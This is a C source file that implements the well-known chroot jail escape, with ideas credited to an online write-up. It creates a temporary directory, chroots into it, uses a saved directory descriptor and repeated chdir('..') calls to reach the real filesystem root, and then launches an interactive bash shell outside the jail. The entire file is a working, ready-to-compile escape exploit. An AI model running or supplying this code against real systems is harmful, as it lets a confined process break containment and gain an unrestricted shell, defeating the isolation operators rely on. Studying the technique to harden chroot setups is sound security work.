// Ideas & parts of the code copied from http://www.bpfh.net/simes/computing/chroot-break.html

#include <stdio.h>  
#include <errno.h>  
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

#define NEW_CHROOT_DIR "enigma" // Temporary folder

// Break out of a chroot() environment and launch a new shell
int main()
{
	int dirFd; // File descriptor to directory
	struct stat sbuf; /* The stat() buffer */

	// Create the directory
	if (stat(NEW_CHROOT_DIR, &sbuf) < 0) {
		if (errno == ENOENT) {
			if (mkdir(NEW_CHROOT_DIR, 0755) < 0) {
				fprintf(stderr, "Failed to create %s - %s\n", NEW_CHROOT_DIR, strerror(errno));
				exit(1);
			}
		} else {
			fprintf(stderr, "Failed to stat %s - %s\n", NEW_CHROOT_DIR, strerror(errno));
			exit(1);
		}
	} else if (!S_ISDIR(sbuf.st_mode)) {
		fprintf(stderr, "Error - %s is not a directory!\n", NEW_CHROOT_DIR);
		exit(1);
	}

	// Get a file descriptor to the current working directory
	if ((dirFd=open(".", O_RDONLY))<0) {  
		fprintf(stderr, "Failed to open . for reading - %s\n", strerror(errno));  
		exit(1);  
	}  

	// Move the jail to a temporary directory
	if (chroot(NEW_CHROOT_DIR) < 0) {
		fprintf(stderr, "Failed to chroot to %s - %s\n", NEW_CHROOT_DIR, strerror(errno));
		exit(1);
	}

	// Break out of the jail by changing the current directory to the original directory
	// This is outside of the new jail
	if (fchdir(dirFd) < 0) {  
		fprintf(stderr,"Failed to fchdir - %s\n", strerror(errno));  
		exit(1);
	}  
	close(dirFd);

	// We have a file descriptor which is outside of the jail
	// Backup to the root level of the filesystem
	int i;
	char pwd[256];
	for(i = 0; i < 10; i++) { // Recurse ten times
		if (getcwd(pwd, 256) != NULL)
			printf("Current directory: %s\n", pwd);
		chdir("..");
	}
	chroot(".");

	// Run a new shell outside of the jail
	if (execl("/bin/bash", "-i", NULL) < 0) {  
		fprintf(stderr, "Failed to exec - %s\n", strerror(errno));  
		exit(1);  
	}
}
